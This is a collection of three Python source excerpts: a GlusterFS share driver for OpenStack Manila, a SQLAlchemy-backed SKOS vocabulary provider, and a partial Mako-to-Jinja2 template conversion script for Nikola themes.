LOG.error(msg)
raise exception.GlusterfsException(msg)
LOG.info("Found %d Gluster volumes allocated for Manila.",
len(gluster_volumes_initial))
self._check_mount_glusterfs()
def _glustermanager(self, gluster_address, req_volume=True):
"""Create GlusterManager object for gluster_address."""
return common.GlusterManager(
gluster_address, self.driver._execute,
self.configuration.glusterfs_path_to_private_key,
self.configuration.glusterfs_server_password,
requires={'volume': req_volume})
def _share_manager(self, share):
"""Return GlusterManager object representing share's backend."""
gluster_address = self.private_storage.get(share['id'], 'volume')
if gluster_address is None:
return
return self._glustermanager(gluster_address)
def _fetch_gluster_volumes(self, filter_used=True):
"""Do a 'gluster volume list | grep <volume pattern>'.
Aggregate the results from all servers.
Extract the named groups from the matching volume names
using the specs given in PATTERN_DICT.
Return a dict with keys of the form <server>:/<volname>
and values being dicts that map names of named groups
to their extracted value.
"""
volumes_dict = {}
for srvaddr in self.configuration.glusterfs_servers:
gluster_mgr = self._glustermanager(srvaddr, False)
if gluster_mgr.user:
logmsg = ("Retrieving volume list "
"on host %s") % gluster_mgr.host
else:
logmsg = ("Retrieving volume list")
out, err = gluster_mgr.gluster_call('volume', 'list', log=logmsg)
for volname in out.split("\n"):
patmatch = self.volume_pattern.match(volname)
if not patmatch:
continue
comp_vol = gluster_mgr.components.copy()
comp_vol.update({'volume': volname})
gluster_mgr_vol = self._glustermanager(comp_vol)
if filter_used:
vshr = gluster_mgr_vol.get_vol_option(
USER_MANILA_SHARE) or ''
if UUID_RE.search(vshr):
continue
pattern_dict = {}
for key in self.volume_pattern_keys:
keymatch = patmatch.group(key)
if keymatch is None:
pattern_dict[key] = None
else:
trans = PATTERN_DICT[key].get('trans', lambda x: x)
pattern_dict[key] = trans(keymatch)
volumes_dict[gluster_mgr_vol.qualified] = pattern_dict
return volumes_dict
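# Illustrative sketch of the return value (servers and volume names are
# hypothetical), assuming the volume pattern contains '#{size}':
#
#     {
#         'host1:/manila-share-volume-3G-1': {'size': 3},
#         'host2:/manila-share-volume-5G-7': {'size': 5},
#     }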
@utils.synchronized("glusterfs_native", external=False)
def _pop_gluster_vol(self, size=None):
"""Pick an unbound volume.
Do a _fetch_gluster_volumes() first to get the complete
list of usable volumes.
Keep only the unbound ones (ones that are not yet used to
back a share).
If size is given, try to pick one which has a size specification
(according to the 'size' named group of the volume pattern),
and its size is greater-than-or-equal to the given size.
Return the volume chosen (in <host>:/<volname> format).
"""
voldict = self._fetch_gluster_volumes()
# calculate the set of unused volumes
unused_vols = set(voldict) - self.gluster_used_vols
if not unused_vols:
# No volumes available for use as share. Warn user.
LOG.warning("No unused gluster volumes available for use as "
"share! Create share won't be supported unless "
"existing shares are deleted or some gluster "
"volumes are created with names matching "
"'glusterfs_volume_pattern'.")
else:
LOG.info("Number of gluster volumes in use: "
"%(inuse-numvols)s. Number of gluster volumes "
"available for use as share: %(unused-numvols)s",
{'inuse-numvols': len(self.gluster_used_vols),
'unused-numvols': len(unused_vols)})
# volmap is the data structure used to categorize and sort
# the unused volumes. It's a nested dictionary of structure
# {<size>: <hostmap>}
# where <size> is either an integer or None,
# <hostmap> is a dictionary of structure {<host>: <vols>}
# where <host> is a host name (IP address), <vols> is a list
# of volumes (gluster addresses).
volmap = {None: {}}
# if both caller has specified size and 'size' occurs as
# a parameter in the volume pattern...
if size and 'size' in self.volume_pattern_keys:
# then this function is used to extract the
# size value for a given volume from the voldict...
get_volsize = lambda vol: voldict[vol]['size']
else:
# else just use a stub.
get_volsize = lambda vol: None
for vol in unused_vols:
# For each unused volume, we extract the <size>
# and <host> values with which it can be inserted
# into the volmap, and conditionally perform
# the insertion (with the condition being: once
# caller specified size and a size indication was
# found in the volume name, we require that the
# indicated size adheres to caller's spec).
volsize = get_volsize(vol)
if not volsize or volsize >= size:
hostmap = volmap.get(volsize)
if not hostmap:
hostmap = {}
volmap[volsize] = hostmap
host = self._glustermanager(vol).host
hostvols = hostmap.get(host)
if not hostvols:
hostvols = []
hostmap[host] = hostvols
hostvols.append(vol)
if len(volmap) > 1:
# volmap has keys apart from the default None,
# ie. volumes with sensible and adherent size
# indication have been found. Then pick the smallest
# of the size values.
chosen_size = sorted(n for n in volmap.keys() if n)[0]
else:
chosen_size = None
chosen_hostmap = volmap[chosen_size]
if not chosen_hostmap:
msg = (_("Couldn't find a free gluster volume to use."))
LOG.error(msg)
raise exception.GlusterfsException(msg)
# From the hosts we choose randomly to tend towards
# even distribution of share backing volumes among
# Gluster clusters.
chosen_host = random.choice(list(chosen_hostmap.keys()))
# Within a host's volumes, choose alphabetically first,
# to make it predictable.
vol = sorted(chosen_hostmap[chosen_host])[0]
self.gluster_used_vols.add(vol)
return vol
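# Illustrative sketch of the volmap built above (hosts and volumes are
# hypothetical). For size=2 and three unused volumes of 3G, 5G and 5G:
#
#     volmap = {
#         None: {},
#         3: {'host1': ['host1:/manila-share-volume-3G-1']},
#         5: {'host2': ['host2:/manila-share-volume-5G-7',
#                       'host2:/manila-share-volume-5G-8']},
#     }
#
# chosen_size is then 3 (the smallest adherent size), a host is picked at
# random from volmap[3], and the alphabetically first volume on that host
# is returned.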
@utils.synchronized("glusterfs_native", external=False)
def _push_gluster_vol(self, exp_locn):
try:
self.gluster_used_vols.remove(exp_locn)
except KeyError:
msg = (_("Couldn't find the share in used list."))
LOG.error(msg)
raise exception.GlusterfsException(msg)
def _wipe_gluster_vol(self, gluster_mgr):
# Create a temporary mount.
gluster_export = gluster_mgr.export
tmpdir = tempfile.mkdtemp()
try:
common._mount_gluster_vol(self.driver._execute, gluster_export,
tmpdir)
except exception.GlusterfsException:
shutil.rmtree(tmpdir, ignore_errors=True)
raise
# Delete the contents of a GlusterFS volume that is temporarily
# mounted.
# From GlusterFS version 3.7, two directories, '.trashcan' at the root
# of the GlusterFS volume and 'internal_op' within the '.trashcan'
# directory, are internally created when a GlusterFS volume is started.
# GlusterFS does not allow unlink(2) of the two directories. So do not
# delete the paths of the two directories, but delete their contents
# along with the rest of the contents of the volume.
srvaddr = gluster_mgr.host_access
if common.numreduct(self.glusterfs_versions[srvaddr]) < (3, 7):
cmd = ['find', tmpdir, '-mindepth', '1', '-delete']
else:
ignored_dirs = map(lambda x: os.path.join(tmpdir, *x),
[('.trashcan', ), ('.trashcan', 'internal_op')])
ignored_dirs = list(ignored_dirs)
cmd = ['find', tmpdir, '-mindepth', '1', '!', '-path',
ignored_dirs[0], '!', '-path', ignored_dirs[1], '-delete']
try:
self.driver._execute(*cmd, run_as_root=True)
except exception.ProcessExecutionError as exc:
msg = (_("Error trying to wipe gluster volume. "
"gluster_export: %(export)s, Error: %(error)s") %
{'export': gluster_export, 'error': exc.stderr})
LOG.error(msg)
raise exception.GlusterfsException(msg)
finally:
# Unmount.
common._umount_gluster_vol(self.driver._execute, tmpdir)
shutil.rmtree(tmpdir, ignore_errors=True)
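# Illustrative sketch: for GlusterFS >= 3.7 and a (hypothetical) temporary
# mount at /tmp/tmpXYZ, the command built above is roughly
#
#     find /tmp/tmpXYZ -mindepth 1 \
#          ! -path /tmp/tmpXYZ/.trashcan \
#          ! -path /tmp/tmpXYZ/.trashcan/internal_op -delete
#
# i.e. everything under the mount is wiped except the two internal
# directories that GlusterFS refuses to unlink.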
def create_share(self, context, share, share_server=None):
"""Create a share using GlusterFS volume.
1 Manila share = 1 GlusterFS volume. Pick an unused
GlusterFS volume for use as a share.
"""
try:
vol = self._pop_gluster_vol(share['size'])
except exception.GlusterfsException:
msg = ("Error creating share %(share_id)s",
{'share_id': share['id']})
LOG.error(msg)
raise
gmgr = self._glustermanager(vol)
export = self.driver._setup_via_manager(
{'share': share, 'manager': gmgr})
gmgr.set_vol_option(USER_MANILA_SHARE, share['id'])
self.private_storage.update(share['id'], {'volume': vol})
# TODO(deepakcs): Enable quota and set it to the share size.
# For native protocol, the export_location should be of the form:
# server:/volname
LOG.info("export_location sent back from create_share: %s",
export)
return export
def delete_share(self, context, share, share_server=None):
"""Delete a share on the GlusterFS volume.
1 Manila share = 1 GlusterFS volume. Put the gluster
volume back in the available list.
"""
gmgr = self._share_manager(share)
if not gmgr:
# Share does not have a record in private storage.
# It means create_share{,_from_snapshot} did not
# succeed(*). In that case we should not obstruct
# share deletion, so we just return doing nothing.
#
# (*) or we have a database corruption but then
# basically does not matter what we do here
return
clone_of = gmgr.get_vol_option(USER_CLONED_FROM) or ''
try:
if UUID_RE.search(clone_of):
# We take responsibility for the lifecycle
# management of those volumes which were
# created by us (as snapshot clones) ...
gmgr.gluster_call('volume', 'delete', gmgr.volume)
else:
# ... for volumes that come from the pool, we return
# them to the pool (after some purification rituals)
self._wipe_gluster_vol(gmgr)
gmgr.set_vol_option(USER_MANILA_SHARE, 'NONE')
self._push_gluster_vol(gmgr.qualified)
except exception.GlusterfsException:
msg = ("Error during delete_share request for "
"share %(share_id)s", {'share_id': share['id']})
LOG.error(msg)
raise
self.private_storage.delete(share['id'])
# TODO(deepakcs): Disable quota.
@staticmethod
def _find_actual_backend_snapshot_name(gluster_mgr, snapshot):
args = ('snapshot', 'list', gluster_mgr.volume, '--mode=script')
out, err = gluster_mgr.gluster_call(
*args,
log=("Retrieving snapshot list"))
snapgrep = list(filter(lambda x: snapshot['id'] in x, out.split("\n")))
if len(snapgrep) != 1:
msg = (_("Failed to identify backing GlusterFS object "
"for snapshot %(snap_id)s of share %(share_id)s: "
"a single candidate was expected, %(found)d was found.") %
{'snap_id': snapshot['id'],
'share_id': snapshot['share_id'],
'found': len(snapgrep)})
raise exception.GlusterfsException(msg)
backend_snapshot_name = snapgrep[0]
return backend_snapshot_name
def create_share_from_snapshot(self, context, share, snapshot,
share_server=None):
old_gmgr = self._share_manager(snapshot['share_instance'])
# The snapshot clone feature in GlusterFS, which is essential to support
# this API, is available in GlusterFS server versions 3.7 and higher, so
# do a version check.
vers = self.glusterfs_versions[old_gmgr.host_access]
minvers = (3, 7)
if common.numreduct(vers) < minvers:
minvers_str = '.'.join(six.text_type(c) for c in minvers)
vers_str = '.'.join(vers)
msg = (_("GlusterFS version %(version)s on server %(server)s does "
"not support creation of shares from snapshot. "
"minimum requirement: %(minversion)s") %
{'version': vers_str, 'server': old_gmgr.host,
'minversion': minvers_str})
LOG.error(msg)
raise exception.GlusterfsException(msg)
# Clone the snapshot. The snapshot clone, a new GlusterFS volume,
# will serve as the share.
backend_snapshot_name = self._find_actual_backend_snapshot_name(
old_gmgr, snapshot)
volume = ''.join(['manila-', share['id']])
args_tuple = (('snapshot', 'activate', backend_snapshot_name,
'force', '--mode=script'),
('snapshot', 'clone', volume, backend_snapshot_name))
for args in args_tuple:
out, err = old_gmgr.gluster_call(
*args,
log=("Creating share from snapshot"))
# Get a manager for the new volume/share.
comp_vol = old_gmgr.components.copy()
comp_vol.update({'volume': volume})
gmgr = self._glustermanager(comp_vol)
export = self.driver._setup_via_manager(
{'share': share, 'manager': gmgr},
{'share': snapshot['share_instance'], 'manager': old_gmgr})
argseq = (('set',
[USER_CLONED_FROM, snapshot['share_id']]),
('set', [USER_MANILA_SHARE, share['id']]),
('start', []))
for op, opargs in argseq:
args = ['volume', op, gmgr.volume] + opargs
gmgr.gluster_call(*args, log=("Creating share from snapshot"))
self.gluster_used_vols.add(gmgr.qualified)
self.private_storage.update(share['id'], {'volume': gmgr.qualified})
return export
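# Illustrative sketch of the gluster CLI calls issued above for a
# (hypothetical) share id 'abc' cloned from backend snapshot 'snap-xyz':
#
#     gluster snapshot activate snap-xyz force --mode=script
#     gluster snapshot clone manila-abc snap-xyz
#     gluster volume set manila-abc user.manila-cloned-from <snapshot share_id>
#     gluster volume set manila-abc user.manila-share abc
#     gluster volume start manila-abc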
def create_snapshot(self, context, snapshot, share_server=None):
"""Creates a snapshot."""
gluster_mgr = self._share_manager(snapshot['share'])
if gluster_mgr.qualified in self.gluster_nosnap_vols_dict:
opret, operrno = -1, 0
operrstr = self.gluster_nosnap_vols_dict[gluster_mgr.qualified]
else:
args = ('--xml', 'snapshot', 'create', 'manila-' + snapshot['id'],
gluster_mgr.volume)
out, err = gluster_mgr.gluster_call(
*args,
log=("Retrieving volume info"))
if not out:
raise exception.GlusterfsException(
'gluster volume info %s: no data received' %
gluster_mgr.volume
)
outxml = etree.fromstring(out)
opret = int(common.volxml_get(outxml, 'opRet'))
operrno = int(common.volxml_get(outxml, 'opErrno'))
operrstr = common.volxml_get(outxml, 'opErrstr', default=None)
if opret == -1:
vers = self.glusterfs_versions[gluster_mgr.host_access]
if common.numreduct(vers) > (3, 6):
# This logic has not yet been implemented in GlusterFS 3.6
if operrno == 0:
self.gluster_nosnap_vols_dict[
gluster_mgr.qualified] = operrstr
msg = _("Share %(share_id)s does not support snapshots: "
"%(errstr)s.") % {'share_id': snapshot['share_id'],
'errstr': operrstr}
LOG.error(msg)
raise exception.ShareSnapshotNotSupported(msg)
raise exception.GlusterfsException(
_("Creating snapshot for share %(share_id)s failed "
"with %(errno)d: %(errstr)s") % {
'share_id': snapshot['share_id'],
'errno': operrno,
'errstr': operrstr})
def delete_snapshot(self, context, snapshot, share_server=None):
"""Deletes a snapshot."""
gluster_mgr = self._share_manager(snapshot['share'])
backend_snapshot_name = self._find_actual_backend_snapshot_name(
gluster_mgr, snapshot)
args = ('--xml', 'snapshot', 'delete', backend_snapshot_name,
'--mode=script')
out, err = gluster_mgr.gluster_call(
*args,
log=("Error deleting snapshot"))
if not out:
raise exception.GlusterfsException(
_('gluster snapshot delete %s: no data received') %
gluster_mgr.volume
)
outxml = etree.fromstring(out)
gluster_mgr.xml_response_check(outxml, args[1:])
def ensure_share(self, context, share, share_server=None):
"""Invoked to ensure that share is exported."""
gmgr = self._share_manager(share)
self.gluster_used_vols.add(gmgr.qualified)
gmgr.set_vol_option(USER_MANILA_SHARE, share['id'])
# Debt...
def manage_existing(self, share, driver_options):
raise NotImplementedError()
def unmanage(self, share):
raise NotImplementedError()
def extend_share(self, share, new_size, share_server=None):
raise NotImplementedError()
def shrink_share(self, share, new_size, share_server=None):
raise NotImplementedError()
|
|
# -*- coding: utf-8 -*-
import logging
log = logging.getLogger(__name__)
from skosprovider.providers import VocabularyProvider
from skosprovider.skos import (
ConceptScheme,
Concept,
Collection,
Label,
Note,
Source
)
from skosprovider_sqlalchemy.models import (
Thing,
ConceptScheme as ConceptSchemeModel,
Concept as ConceptModel,
Collection as CollectionModel,
Label as LabelModel,
Match as MatchModel,
Visitation
)
from sqlalchemy.orm import (
joinedload,
)
from sqlalchemy.orm.exc import (
NoResultFound
)
from skosprovider.uri import (
DefaultUrnGenerator,
DefaultConceptSchemeUrnGenerator
)
class SQLAlchemyProvider(VocabularyProvider):
'''
A :class:`skosprovider.providers.VocabularyProvider` that uses SQLAlchemy
as backend.
'''
_conceptscheme = None
'''
The concept scheme, once it has been loaded. Should never be accessed
directly.
'''
expand_strategy = 'recurse'
'''
Determines how the expand method will operate. Options are:
* `recurse`: Determine all narrower concepts by recursively querying the
database. Can take a long time for concepts that are at the top of a
large hierarchy.
* `visit`: Query the database's
:class:`Visitation <skosprovider_sqlalchemy.models.Visitation>` table.
This table contains a nested set representation of each conceptscheme.
Actually creating the data in this table needs to be scheduled.
'''
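# A minimal construction sketch (engine URL, metadata and ids are hypothetical,
# not part of this module), showing how the 'visit' strategy would be selected:
#
#     from sqlalchemy import create_engine
#     from sqlalchemy.orm import sessionmaker
#
#     engine = create_engine('sqlite:///vocab.db')
#     session_maker = sessionmaker(bind=engine)
#     provider = SQLAlchemyProvider(
#         {'id': 'TREES', 'conceptscheme_id': 1},
#         session_maker,
#         expand_strategy='visit'
#     )
#
# Note that the Visitation table must be populated beforehand for the 'visit'
# strategy to pay off; _expand_visit below falls back to recursion when no
# Visitation row is found.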
def __init__(self, metadata, session, **kwargs):
'''
Create a new provider
:param dict metadata: Metadata about the provider. Apart from the usual
id, a conceptscheme_id can also be passed.
:param :class:`sqlalchemy.orm.session.Session` session: The database
session. This can also be a callable that returns a Session.
'''
if 'subject' not in metadata:
metadata['subject'] = []
self.metadata = metadata
if 'uri_generator' in kwargs:
self.uri_generator = kwargs.get('uri_generator')
else:
self.uri_generator = DefaultUrnGenerator(self.metadata.get('id'))
try:
self.session = session()
except TypeError as e:
self.session = session
try:
self.conceptscheme_id = int(metadata.get(
'conceptscheme_id', metadata.get('id')
))
except ValueError:
raise ValueError(
'Please provide a valid integer for the conceptscheme_id.'
)
if 'expand_strategy' in kwargs:
if kwargs['expand_strategy'] in ['recurse', 'visit']:
self.expand_strategy = kwargs['expand_strategy']
else:
raise ValueError(
'Unknown expand strategy.'
)
self.allowed_instance_scopes = ['single', 'threaded_thread']
@property
def concept_scheme(self):
if self._conceptscheme is None:
self._conceptscheme = self._get_concept_scheme()
return self._conceptscheme
def _get_concept_scheme(self):
'''
Find the :class:`skosprovider.skos.ConceptScheme` for this provider,
based on its configured conceptscheme_id.
:rtype: :class:`skosprovider.skos.ConceptScheme`
'''
csm = self.session\
.query(ConceptSchemeModel)\
.options(joinedload('labels'))\
.options(joinedload('notes'))\
.options(joinedload('languages'))\
.options(joinedload('sources'))\
.get(self.conceptscheme_id)
return ConceptScheme(
uri=csm.uri,
labels=[
Label(l.label, l.labeltype_id, l.language_id)
for l in csm.labels
],
notes=[
Note(n.note, n.notetype_id, n.language_id, n.markup)
for n in csm.notes
],
languages=[
l.id for l in csm.languages
],
sources=[
Source(s.citation, s.markup) for s in csm.sources
]
)
def _from_thing(self, thing):
'''
Load one concept or collection from the database.
:param :class:`skosprovider_sqlalchemy.models.Thing` thing: Thing
to load.
'''
if thing.type and thing.type == 'collection':
return Collection(
id=thing.concept_id,
uri=thing.uri if thing.uri is not None else self.uri_generator.generate(type='collection', id=thing.concept_id),
concept_scheme=self.concept_scheme,
labels=[
Label(l.label, l.labeltype_id, l.language_id)
for l in thing.labels
],
notes=[
Note(n.note, n.notetype_id, n.language_id, n.markup)
for n in thing.notes
],
sources=[
Source(s.citation, s.markup ) for s in thing.sources
],
members=[member.concept_id for member in thing.members] if hasattr(thing, 'members') else [],
member_of=[member_of.concept_id for member_of in thing.member_of],
superordinates=[broader_concept.concept_id for broader_concept in thing.broader_concepts],
infer_concept_relations=thing.infer_concept_relations
)
else:
matches = {}
for m in thing.matches:
key = m.matchtype.name[:m.matchtype.name.find('Match')]
if key not in matches:
matches[key] = []
matches[key].append(m.uri)
return Concept(
id=thing.concept_id,
uri=thing.uri if thing.uri is not None else self.uri_generator.generate(type='concept', id=thing.concept_id),
concept_scheme=self.concept_scheme,
labels=[
Label(l.label, l.labeltype_id, l.language_id)
for l in thing.labels
],
notes=[
Note(n.note, n.notetype_id, n.language_id, n.markup)
for n in thing.notes
],
sources=[
Source(s.citation, s.markup) for s in thing.sources
],
broader=[c.concept_id for c in thing.broader_concepts],
narrower=[c.concept_id for c in thing.narrower_concepts],
related=[c.concept_id for c in thing.related_concepts],
member_of=[member_of.concept_id for member_of in thing.member_of],
subordinate_arrays=[narrower_collection.concept_id for narrower_collection in thing.narrower_collections],
matches=matches
)
def get_by_id(self, id):
try:
thing = self.session\
.query(Thing)\
.options(joinedload('labels'))\
.options(joinedload('notes'))\
.options(joinedload('sources'))\
.filter(
Thing.concept_id == int(id),
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
return self._from_thing(thing)
def get_by_uri(self, uri):
'''Get all information on a concept or collection, based on a
:term:`URI`.
This method will only find concepts or collections whose :term:`URI` is
actually stored in the database. It will not find anything that has
no :term:`URI` in the database, but does have a matching :term:`URI`
after generation.
:rtype: :class:`skosprovider.skos.Concept` or
:class:`skosprovider.skos.Collection` or `False` if the concept or
collection is unknown to the provider.
'''
try:
thing = self.session\
.query(Thing)\
.options(joinedload('labels'))\
.options(joinedload('notes'))\
.options(joinedload('sources'))\
.filter(
Thing.uri == uri,
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
return self._from_thing(thing)
def _get_id_and_label(self, c, lan):
'''
:param skosprovider_sqlalchemy.models.Thing c: A concept or collection.
:param string lan: A language (e.g. "en", "nl", "la", "fr")
'''
l = c.label(lan)
return {
'id': c.concept_id,
'uri': c.uri,
'type': c.type,
'label': l.label if l is not None else None
}
def find(self, query, **kwargs):
lan = self._get_language(**kwargs)
model = Thing
if 'matches' in query:
match_uri = query['matches'].get('uri', None)
if not match_uri:
raise ValueError(
'Please provide a URI to match with.'
)
model = ConceptModel
q = self.session\
.query(model)\
.options(joinedload('labels'))\
.join(MatchModel)\
.filter(model.conceptscheme_id == self.conceptscheme_id)
mtype = query['matches'].get('type')
if mtype and mtype in Concept.matchtypes:
mtype += 'Match'
mtypes = [mtype]
if mtype == 'closeMatch':
mtypes.append('exactMatch')
q = q.filter(
MatchModel.uri == match_uri,
MatchModel.matchtype_id.in_(mtypes)
)
else:
q = q.filter(MatchModel.uri == match_uri)
else:
q = self.session\
.query(model)\
.options(joinedload('labels'))\
.filter(model.conceptscheme_id == self.conceptscheme_id)
if 'type' in query and query['type'] in ['concept', 'collection']:
q = q.filter(model.type == query['type'])
if 'label' in query:
q = q.filter(
model.labels.any(
LabelModel.label.ilike('%' + query['label'].lower() + '%')
)
)
if 'collection' in query:
coll = self.get_by_id(query['collection']['id'])
if not coll or not isinstance(coll, Collection):
raise ValueError(
'You are searching for items in a nonexistent collection.'
)
if 'depth' in query['collection'] and query['collection']['depth'] == 'all':
members = self.expand(coll.id)
else:
members = coll.members
q = q.filter(model.concept_id.in_(members))
all = q.all()
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(all, sort, lan, sort_order=='desc')]
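# Illustrative query sketch (URI and label are hypothetical):
#
#     provider.find({
#         'type': 'concept',
#         'label': 'church',
#         'matches': {
#             'uri': 'http://vocab.getty.edu/aat/300007466',
#             'type': 'close'
#         }
#     })
#
# Per the logic above, a 'close' match type is expanded to 'closeMatch' and
# additionally widened to include 'exactMatch' rows.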
def get_all(self, **kwargs):
all = self.session\
.query(Thing)\
.options(joinedload('labels'))\
.filter(Thing.conceptscheme_id == self.conceptscheme_id)\
.all()
lan = self._get_language(**kwargs)
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(all, sort, lan, sort_order=='desc')]
def get_top_concepts(self, **kwargs):
# get the concepts that have no direct broader concept
top = self.session\
.query(ConceptModel)\
.options(joinedload('labels'))\
.filter(
ConceptModel.conceptscheme_id == self.conceptscheme_id,
ConceptModel.broader_concepts == None
).all()
# check if they have an indirect broader concept
def _has_higher_concept(c):
for coll in c.member_of:
if coll.infer_concept_relations and (coll.broader_concepts or _has_higher_concept(coll)):
return True
return False
top = [c for c in top if not _has_higher_concept(c)]
lan = self._get_language(**kwargs)
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(top, sort, lan, sort_order=='desc')]
def expand(self, id):
try:
thing = self.session\
.query(Thing)\
.filter(
Thing.concept_id == id,
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
if self.expand_strategy == 'visit':
return self._expand_visit(thing)
elif self.expand_strategy == 'recurse':
return self._expand_recurse(thing)
def _expand_recurse(self, thing):
ret = []
if thing.type == 'collection':
for m in thing.members:
ret += self._expand_recurse(m)
else:
ret.append(thing.concept_id)
for n in thing.narrower_concepts:
ret += self._expand_recurse(n)
for n in thing.narrower_collections:
if n.infer_concept_relations:
ret += self._expand_recurse(n)
return list(set(ret))
def _expand_visit(self, thing):
if thing.type == 'collection':
ret = []
for m in thing.members:
ret += self._expand_visit(m)
else:
try:
cov = self.session\
.query(Visitation.lft, Visitation.rght)\
.filter(Visitation.conceptscheme_id == self.conceptscheme_id)\
.filter(Visitation.concept_id == thing.id)\
.one()
except NoResultFound:
return self._expand_recurse(thing)
ids = self.session\
.query(Thing.concept_id)\
.join(Visitation)\
.filter(Thing.conceptscheme_id == self.conceptscheme_id)\
.filter(Visitation.lft.between(cov[0], cov[1]))\
.all()
ret = [id[0] for id in ids]
return list(set(ret))
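# Worked example of the nested-set lookup above (lft/rght numbers are
# hypothetical): if the Visitation row for a concept has lft=4 and rght=9,
# then every Thing whose own Visitation.lft falls within [4, 9] belongs to
# that concept's subtree, so the whole expansion is answered with a single
# BETWEEN query instead of the per-node recursion used by _expand_recurse.
# When no Visitation row exists for the concept, the code above falls back
# to _expand_recurse.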
def get_top_display(self, **kwargs):
'''
Returns all concepts or collections that form the top-level of a display
hierarchy.
As opposed to the :meth:`get_top_concepts`, this method can possibly
return both concepts and collections.
:rtype: A list of concepts and collections. Each entry has an id and
a label. The label is determined by looking at the `**kwargs`
parameter and the default language of the provider, falling back
to `en` if nothing is present.
'''
tco = self.session\
.query(ConceptModel)\
.options(joinedload('labels'))\
.filter(
ConceptModel.conceptscheme_id == self.conceptscheme_id,
ConceptModel.broader_concepts == None,
ConceptModel.member_of == None
).all()
tcl = self.session\
.query(CollectionModel)\
.options(joinedload('labels'))\
.filter(
CollectionModel.conceptscheme_id == self.conceptscheme_id,
CollectionModel.broader_concepts == None,
CollectionModel.member_of == None
).all()
res = tco + tcl
lan = self._get_language(**kwargs)
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(res, sort, lan, sort_order=='desc')]
def get_children_display(self, id, **kwargs):
'''
Return a list of concepts or collections that should be displayed
under this concept or collection.
:param id: A concept or collection id.
:rtype: A list of concepts and collections. Each entry has an id and
a label. The label is determined by looking at the `**kwargs`
parameter and the default language of the provider, falling back
to `en` if nothing is present. If the id does not exist,
return `False`.
'''
try:
thing = self.session\
.query(Thing)\
.filter(
Thing.concept_id == int(id),
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
lan = self._get_language(**kwargs)
res = []
if thing.type == 'concept':
if len(thing.narrower_collections) > 0:
res += thing.narrower_collections
elif len(thing.narrower_concepts)>0:
res += thing.narrower_concepts
if thing.type == 'collection' and hasattr(thing, 'members'):
res += thing.members
sort = self._get_sort(**kwargs)
sort_order = self._get_sort_order(**kwargs)
return [self._get_id_and_label(c, lan) for c in self._sort(res, sort, lan, sort_order=='desc')]
|
|
#!/usr/bin/env python
"""Script to convert templates from Mako to Jinja2."""
import io
import glob
import sys
import os
import re
import json
import shutil
import tempfile
import colorama
import jinja2
dumb_replacements = [
["{% if any(post.is_mathjax for post in posts) %}", '{% if posts|selectattr("is_mathjax")|list %}'],
["json.dumps(title)", "title|tojson"],
["{{ parent.extra_head() }}", "{{ super() }}"],
["{{ parent.content() }}", "{{ super() }}"],
["prefix='\\", "prefix='"],
["og: http://ogp.me/ns# \\", "og: http://ogp.me/ns#"],
["article: http://ogp.me/ns/article# \\", "article: http://ogp.me/ns/article#"],
["fb: http://ogp.me/ns/fb# \\", "fb: http://ogp.me/ns/fb#"],
['dir="rtl" \\', 'dir="rtl"'],
['sorted(translations)', 'translations|sort'],
]
dumber_replacements = [
['<%! import json %>\n\n', ''],
["<html\n\\", "<html\n"],
["\n'\\\n", "\n'\n"],
["{% endif %}\n\\", "{% endif %}\n"]
]
def jinjify(in_theme, out_theme):
"""Convert in_theme into a jinja version and put it in out_theme"""
in_templates_path = os.path.join(in_theme, "templates")
out_templates_path = os.path.join(out_theme, "templates")
try:
os.makedirs(out_templates_path)
except:
pass
lookup = jinja2.Environment()
lookup.filters['tojson'] = json.dumps
lookup.loader = jinja2.FileSystemLoader([out_templates_path], encoding='utf-8')
for template in glob.glob(os.path.join(in_templates_path, "*.tmpl")):
out_template = os.path.join(out_templates_path, os.path.basename(template))
with io.open(template, "r", encoding="utf-8") as inf:
data = mako2jinja(inf)
lines = []
for line in data.splitlines():
for repl in dumb_replacements:
line = line.replace(*repl)
lines.append(line)
data = '\n'.join(lines)
for repl in dumber_replacements:
data = data.replace(*repl)
with io.open(out_template, "w+", encoding="utf-8") as outf:
outf.write(data + '\n')
# Syntax check output
source, filename = lookup.loader.get_source(lookup, os.path.basename(template))[:2]
try:
lookup.parse(source)
except Exception as e:
error("Syntax error in {0}:{1}".format(out_template, e.lineno))
parent = os.path.basename(in_theme.rstrip('/'))
child = os.path.basename(out_theme.rstrip('/'))
mappings = {
'base-jinja': 'base',
'bootstrap3-jinja': 'base-jinja',
}
if child in mappings:
parent = mappings[child]
# Copy assets in bootstrap/bootstrap3
if child == 'bootstrap3-jinja':
assets_dir = os.path.join(out_theme, "assets")
if os.path.exists(assets_dir):
shutil.rmtree(assets_dir)
shutil.copytree(
os.path.join(in_theme, "assets"), os.path.join(out_theme, "assets"),
symlinks=True)
# Copy bundles
# shutil.copy(os.path.join(in_theme, "bundles"), os.path.join(out_theme, "bundles"))
# Copy README
if os.path.isfile(os.path.join(in_theme, "README.md")):
shutil.copy(os.path.join(in_theme, "README.md"), os.path.join(out_theme, "README.md"))
def error(msg):
print(colorama.Fore.RED + "ERROR: " + msg)
def mako2jinja(input_file):
output = ''
# TODO: OMG, this code is so horrible. Look at it; just look at it:
macro_start = re.compile(r'(.*)<%.*def name="(.*?)".*>(.*)', re.IGNORECASE)
macro_end = re.compile(r'(.*)</%def>(.*)', re.IGNORECASE)
if_start = re.compile(r'(.*)% *if (.*):(.*)', re.IGNORECASE)
if_else = re.compile(r'(.*)% *else.*:(.*)', re.IGNORECASE)
if_elif = re.compile(r'(.*)% *elif (.*):(.*)', re.IGNORECASE)
if_end = re.compile(r'(.*)% *endif(.*)', re.IGNORECASE)
for_start = re.compile(r'(.*)% *for (.*):(.*)', re.IGNORECASE)
for_end = re.compile(r'(.*)% *endfor(.*)', re.IGNORECASE)
namespace = re.compile(r'(.*)<% *namespace name="(.*?)".* file="(.*?)".*/>(.*)', re.IGNORECASE)
